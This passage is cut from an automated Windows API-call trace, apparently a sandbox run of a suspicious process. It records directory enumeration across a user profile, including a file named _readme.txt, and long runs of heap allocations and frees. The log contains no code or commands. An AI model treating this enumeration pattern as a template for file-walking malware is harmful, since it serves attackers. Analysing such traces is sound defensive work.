ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0180.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x99001db0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x99001db0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0180.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe140cf30, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0xe140cf30, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe140cf30, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0180.000] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned=".txt" [0180.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c76980 | out: hHeap=0x6a0000) returned 1 [0180.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe140cf30, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0xe140cf30, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe140cf30, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0180.000] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0180.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0180.001] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0180.002] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0180.002] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0180.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0180.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f68 | out: hHeap=0x6a0000) returned 1 [0180.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ba8 | out: hHeap=0x6a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a18 | out: hHeap=0x6a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27900 | out: hHeap=0x6a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0180.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27838 | out: hHeap=0x6a0000) returned 1 [0180.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27770 | out: hHeap=0x6a0000) returned 1 [0180.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27810 | out: hHeap=0x6a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27860 | out: hHeap=0x6a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c20 | out: hHeap=0x6a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27bd0 | out: hHeap=0x6a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27cc0 | out: hHeap=0x6a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278d8 | out: hHeap=0x6a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27d10 | out: hHeap=0x6a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279f0 | out: hHeap=0x6a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27928 | out: hHeap=0x6a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27978 | out: hHeap=0x6a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ae0 | out: hHeap=0x6a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b08 | out: hHeap=0x6a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b30 | out: hHeap=0x6a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84de0 | out: hHeap=0x6a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84e18 | out: hHeap=0x6a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84e50 | out: hHeap=0x6a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d301d0 | out: hHeap=0x6a0000) returned 1 [0180.011] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0180.011] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0180.011] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b30 [0180.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0180.011] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b30 | out: hHeap=0x6a0000) returned 1 [0180.011] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.011] PathFindFileNameW (pszPath="") returned="" [0180.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0180.011] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0180.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0180.012] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.012] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xa1a18c20, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xa1a18c20, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0180.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82cc8 [0180.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b30 [0180.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0180.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82cc8 | out: hHeap=0x6a0000) returned 1 [0180.013] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0180.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82cc8 [0180.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbfa50 [0180.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0180.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0180.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b30 | out: hHeap=0x6a0000) returned 1 [0180.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0180.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82cc8 | out: hHeap=0x6a0000) returned 1 [0180.014] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0180.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82cc8 [0180.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0180.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82bc0 [0180.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0180.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0180.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0180.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cbfa50 | out: hHeap=0x6a0000) returned 1 [0180.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0180.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82cc8 | out: hHeap=0x6a0000) returned 1 [0180.016] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0180.016] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0180.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0180.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0180.016] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0180.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82cc8 [0180.016] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0180.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0180.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0180.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0180.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0180.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0180.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0180.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0180.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0180.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.034] RtlAllocateHeap 